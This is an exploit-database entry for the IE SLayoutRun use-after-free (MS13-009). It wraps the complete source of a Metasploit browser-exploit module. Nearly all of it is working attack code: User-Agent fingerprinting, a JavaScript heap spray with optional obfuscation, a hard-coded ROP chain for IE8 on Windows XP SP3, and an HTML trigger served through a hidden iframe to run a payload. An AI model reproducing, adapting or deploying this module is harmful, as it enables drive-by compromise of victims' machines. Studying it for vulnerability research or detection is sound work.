Description
Remote exploit for the Windows platform: a Metasploit browser-exploit module for a use-after-free in Microsoft Internet Explorer (MS13-009, CVE-2013-0025), as listed in the module's references below. The module's only concrete target is IE 8 on Windows XP SP3 (it uses hard-coded msvcrt ROP gadget addresses for that build); the "Automatic" target falls back to a 404 for any other User-Agent. The flaw was fixed by the MS13-009 update.
{"id": "1337DAY-ID-20367", "type": "zdt", "bulletinFamily": "exploit", "title": "Microsoft Internet Explorer SLayoutRun Use-After-Free (MS13-009)", "description": "Exploit for windows platform in category remote exploits", "published": "2013-02-14T00:00:00", "modified": "2013-02-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/20367", "reporter": "Scott Bell", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-02-05T03:11:48", "viewCount": 7, "enchantments": {"score": {"value": 7.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2013-0025"]}]}, "exploitation": null, "vulnersScore": 7.0}, "sourceHref": "https://0day.today/exploit/20367", "sourceData": "require 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = AverageRanking\r\n \r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::RopDb\r\n \r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Microsoft Internet Explorer SLayoutRun Use-After-Free\",\r\n 'Description' => %q{\r\n This module exploits a use-after-free vulnerability in Microsoft Internet Explorer\r\n where a CParaElement node is released but a reference is still kept\r\n in CDoc. 
This memory is reused when a CDoc relayout is performed.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Scott Bell <[email\u00a0protected]>', # Vulnerability discovery & Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-0025' ],\r\n [ 'MSB', 'MS13-009' ],\r\n [ 'URL', 'http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf' ],\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\",\r\n 'Space' => 1024,\r\n 'DisableNops' => true,\r\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\",\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x5f4 } ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Feb 13 2013\",\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n ], self.class)\r\n \r\n end\r\n \r\n def get_target(agent)\r\n #If the user is already specified by the user, we'll just use that\r\n return target if target.name != 'Automatic'\r\n \r\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\r\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\r\n \r\n ie_name = \"IE #{ie}\"\r\n \r\n case nt\r\n when '5.1'\r\n os_name = 'Windows XP SP3'\r\n end\r\n \r\n targets.each do |t|\r\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? 
and t.name.include?(os_name))\r\n print_status(\"Target selected as: #{t.name}\")\r\n return t\r\n end\r\n end\r\n \r\n return nil\r\n end\r\n \r\n def heap_spray(my_target, p)\r\n js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))\r\n js_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(target.arch))\r\n \r\n js = %Q|\r\n \r\n var heap_obj = new heapLib.ie(0x20000);\r\n var code = unescape(\"#{js_code}\");\r\n var nops = unescape(\"#{js_nops}\");\r\n while (nops.length < 0x80000) nops += nops;\r\n var offset = nops.substring(0, #{my_target['Offset']});\r\n var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\r\n while (shellcode.length < 0x40000) shellcode += shellcode;\r\n var block = shellcode.substring(0, (0x80000-6)/2);\r\n heap_obj.gc();\r\n for (var i=1; i < 0x300; i++) {\r\n heap_obj.alloc(block);\r\n }\r\n var overflow = nops.substring(0, 10);\r\n \r\n |\r\n \r\n js = heaplib(js, {:noobfu => true})\r\n \r\n if datastore['OBFUSCATE']\r\n js = ::Rex::Exploitation::JSObfu.new(js)\r\n js.obfuscate\r\n \r\n end\r\n \r\n return js\r\n end\r\n \r\n def get_payload(t, cli)\r\n code = payload.encoded\r\n \r\n # No rop. Just return the payload.\r\n return code if t['Rop'].nil?\r\n \r\n # ROP chain generated by mona.py - See corelan.be\r\n case t['Rop']\r\n when :msvcrt\r\n print_status(\"Using msvcrt ROP\")\r\n rop_nops = [0x77c39f92].pack(\"V\") * 11 # RETN\r\n rop_payload = generate_rop_payload('msvcrt', \"\", {'target'=>'xp'})\r\n rop_payload << rop_nops\r\n rop_payload << [0x77c364d5].pack(\"V\") # POP EBP # RETN\r\n rop_payload << [0x77c15ed5].pack(\"V\") # XCHG EAX, ESP # RETN\r\n rop_payload << [0x77c35459].pack(\"V\") # PUSH ESP # RETN\r\n rop_payload << [0x77c39f92].pack(\"V\") # RETN\r\n rop_payload << [0x0c0c0c8c].pack(\"V\") # Shellcode offset\r\n rop_payload << code\r\n \r\n end\r\n \r\n return rop_payload\r\n end\r\n \r\n def this_resource\r\n r = get_resource\r\n return ( r == '/') ? 
'' : r\r\n end\r\n \r\n def get_exploit(my_target, cli)\r\n p = get_payload(my_target, cli)\r\n js = heap_spray(my_target, p)\r\n \r\n \r\n html = %Q|\r\n <!doctype html>\r\n <html>\r\n <head>\r\n <script>\r\n var data\r\n var objArray = new Array(1800);\r\n #{js}\r\n \r\n setTimeout(function(){\r\n for (var i=0;i<objArray.length;i++){\r\n objArray[i] = document.createElement('body');\r\n document.body.appendChild(objArray[i])\r\n objArray[i].style.display = \"none\"\r\n }\r\n \r\n document.body.style.whiteSpace = \"pre-line\"\r\n \r\n for(var i=0;i<10;i++){\r\n for (var i=0;i<(objArray.length-650);i++){\r\n objArray[i].className = data += unescape(\"%u0c0c%u0c0c\");\r\n }\r\n }\r\n \r\n setTimeout(function(){document.body.innerHTML = \"boo\"}, 100)\r\n }, 100)\r\n \r\n </script>\r\n </head>\r\n <body>\r\n <p> </p>\r\n </body>\r\n </html>\r\n |\r\n \r\n return html\r\n end\r\n \r\n \r\n def get_iframe\r\n html = %Q|\r\n <html>\r\n <body>\r\n <iframe src=\"#{this_resource}/#{@iframe_name}\" height=\"1\" width=\"1\"></iframe>\r\n </body>\r\n </html>\r\n |\r\n \r\n return html\r\n end\r\n \r\n \r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n uri = request.uri\r\n print_status(\"Requesting: #{uri}\")\r\n \r\n my_target = get_target(agent)\r\n # Avoid the attack if no suitable target found\r\n if my_target.nil?\r\n print_error(\"Browser not supported, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n \r\n \r\n if uri =~ /#{@iframe_name}/\r\n html = get_exploit(my_target, cli)\r\n html = html.gsub(/^\\t\\t/, '')\r\n print_status(\"Sending HTML...\")\r\n elsif uri=~ /\\/$/\r\n html = get_iframe\r\n print_status \"Sending IFRAME...\"\r\n end\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n \r\n \r\n end\r\n \r\n def exploit\r\n @iframe_name = \"#{Rex::Text.rand_text_alpha(5)}.html\"\r\n super\r\n end\r\nend\n\n# 0day.today [2018-02-05] #", "_state": {"dependencies": 1647589307, "score": 0}}
{}